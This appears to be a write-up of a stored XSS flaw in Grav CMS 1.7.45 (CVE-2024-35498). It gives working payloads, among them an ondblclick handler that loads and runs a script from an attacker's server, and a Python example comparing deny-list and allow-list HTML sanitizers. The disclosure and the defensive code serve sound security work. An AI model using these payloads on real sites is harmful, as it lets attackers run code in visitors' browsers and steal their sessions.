A Quick Dive into XSS Vulnerability in Grav CMS v1.7.45 CVE-2024-35498
This vulnerability allows users with restricted page creation and editing privileges to insert harmful JavaScript code into the pages they create. Although the admin has restricted these users from inserting JavaScript directly, they can abuse the ondblclick event handler attribute on HTML tags to bypass these restrictions, potentially escalating their privileges past what the admin intended. I don't want to bore you all.
Checking privileges for the testing user
- User Privileges Check: Users with restricted access can only edit and insert HTML tags but cannot run JavaScript directly. The image below shows the privileges given to this user.
The user cannot insert JavaScript into the pages they create or edit. However, they can still use certain dangerous HTML tags. So sad.
POC (OR) EXPLOITATION:
- Log in to the account.
While creating the user in the admin panel, I discovered that the <a> tag is not restricted. The <a> tag, also known as the anchor tag, is primarily used to define hyperlinks, facilitating navigation from one page to another through clickable links. Despite its typical use, the absence of restrictions on this tag in this context poses a significant security risk. I tried many ways, like inserting a payload such as
<a href="javascript:alert(1)">
I mostly use this payload to get an XSS popup in bug hunting, so I tried it. Unfortunately, I couldn't get the payload to execute; the JavaScript code was fully removed while saving. So I tried every event handler to execute JavaScript code. No luck!
Crafting the Malicious Page:
Then I noticed that <a ondblclick='alert(1)'><h1>test</h1></a>
executed JavaScript on that webpage.
The code was inserted successfully.
When I visited the webpage, I saw the XSS vulnerability in action with the basic payload, just an alert saying "1". But hold on, an attacker wouldn't stop there with something so simple, right? They'd want to load something much more dangerous.
So, I decided to test it further and used this payload to load a JavaScript file from the attacker’s server:
<a ondblclick='var s=document.createElement("script");s.src="http://192.168.86.129:9000/test.js";s.onerror=()=>console.error("Error loading script!");document.head.appendChild(s);'><h1>test</h1></a>
This little snippet tricks the page into pulling in a JavaScript file from an external source. Double-clicking the link doesn’t just show an alert anymore — it loads and executes the attacker’s script. Looks like this XSS vulnerability could do a lot more than just pop up a simple message!
I added the payload, saved the changes, and then checked out the webpage. To my surprise, the log showed it fetching a JavaScript file from the attacker’s server. Looks like the script was live and kicking!
BOOM!! The XSS also popped up.
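The root cause described above is a deny-list filter: it strips javascript: URLs from href, but leaves on* event handler attributes alone, so the same script runs from ondblclick. The standard fix is an allow-list that names the permitted tags and, per tag, the permitted attributes, and rejects every on* attribute and every unsafe URL scheme. The following is an added example written for this write-up using only Python's standard library; it is not Grav's code and does not reproduce Grav's actual filter. The deny-list policy imitates the behaviour described in the post, the allow-list policy is the hardened counterpart, and the constructed inputs reuse the post's two payload shapes with a placeholder host in place of the attacker's server.

```python
"""Deny-list vs allow-list HTML sanitizing with the standard library only.

Added example for the CVE-2024-35498 write-up; not Grav's own code.
The deny-list policy imitates the behaviour the write-up describes
(javascript: URLs removed, event-handler attributes kept); the allow-list
policy is the fix: known tags, known attributes, known URL schemes only.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed policy for this example: tags a restricted editor may use and
# the attributes each tag may carry. Anything not listed is stripped.
ALLOWED_ATTRS = {
    "a": {"href", "title"},
    "h1": set(), "h2": set(), "p": set(), "strong": set(), "em": set(), "br": set(),
}
SAFE_SCHEMES = {"", "http", "https", "mailto"}   # "" means a relative URL


def _scheme(url):
    # urlsplit drops ASCII tab/CR/LF (browsers ignore them inside URLs too)
    # and lowercases the scheme, so "  JavaScript:..." still compares equal.
    return urlsplit((url or "").strip()).scheme.lower()


def deny_list_policy(tag, name, value):
    """The weak filter: drop a javascript: URL in href/src, keep everything else."""
    return not (name in ("href", "src") and _scheme(value) == "javascript")


def allow_list_policy(tag, name, value):
    """The fix: only listed attributes survive, and no on* handler ever does."""
    if name.startswith("on"):
        return False
    if name not in ALLOWED_ATTRS.get(tag, set()):
        return False
    if name in ("href", "src") and _scheme(value) not in SAFE_SCHEMES:
        return False
    return True


class _Rebuilder(HTMLParser):
    """Re-serialises markup while applying the tag and attribute policy."""

    def __init__(self, attr_policy, restrict_tags):
        super().__init__()  # convert_charrefs=True: text and attribute values arrive decoded
        self.attr_policy = attr_policy
        self.restrict_tags = restrict_tags
        self.out, self.findings = [], []

    def _tag_ok(self, tag):
        return not self.restrict_tags or tag in ALLOWED_ATTRS

    def handle_starttag(self, tag, attrs):
        if not self._tag_ok(tag):
            self.findings.append((tag, None, None))   # whole tag dropped, text inside kept
            return
        kept = []
        for name, value in attrs:   # HTMLParser lowercases names and decodes entities
            if self.attr_policy(tag, name, value):
                kept.append((name, value))
            else:
                self.findings.append((tag, name, value))
        rendered = "".join(
            f' {n}="{escape(v, quote=True)}"' if v is not None else f" {n}" for n, v in kept
        )
        self.out.append(f"<{tag}{rendered}>")

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)   # <br/> style: emit no closing tag

    def handle_endtag(self, tag):
        if self._tag_ok(tag):
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))   # text is re-escaped so it cannot become markup


def sanitize(html, attr_policy, restrict_tags):
    """Return (clean_html, findings); findings lists every tag/attribute stripped."""
    p = _Rebuilder(attr_policy, restrict_tags)
    p.feed(html)
    p.close()
    return "".join(p.out), p.findings


def deny_list_sanitize(html):
    return sanitize(html, deny_list_policy, restrict_tags=False)


def allow_list_sanitize(html):
    return sanitize(html, allow_list_policy, restrict_tags=True)


# Constructed inputs: the write-up's payload shapes, with a placeholder host.
PAYLOAD_HREF = '<a href="javascript:alert(1)">test</a>'
PAYLOAD_EVENT = "<a ondblclick='alert(1)'><h1>test</h1></a>"
PAYLOAD_LOADER = ("<a ondblclick='var s=document.createElement(\"script\");"
                  "s.src=\"http://ATTACKER-HOST-PLACEHOLDER/test.js\";"
                  "document.head.appendChild(s);'><h1>test</h1></a>")

if __name__ == "__main__":
    for payload in (PAYLOAD_HREF, PAYLOAD_EVENT, PAYLOAD_LOADER):
        weak, _ = deny_list_sanitize(payload)
        hard, stripped = allow_list_sanitize(payload)
        print("deny-list :", weak)
        print("allow-list:", hard, "| stripped:", [(t, a) for t, a, _ in stripped])
```

Run on the event-handler payloads, the deny-list path returns the markup unchanged while the allow-list path returns <a><h1>test</h1></a> and records the stripped ondblclick attribute. The findings list is also useful on existing stored pages: running the allow-list sanitizer over content that restricted editors have already saved and reviewing what it would strip is a quick way to find handlers that slipped through before the filter was fixed.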
Version of Grav and my workstation:
* PHP 8.2.12 (cli) (built: Jan 8 2024 06:21:20) (NTS)
* Grav v1.7.45
* Kali Linux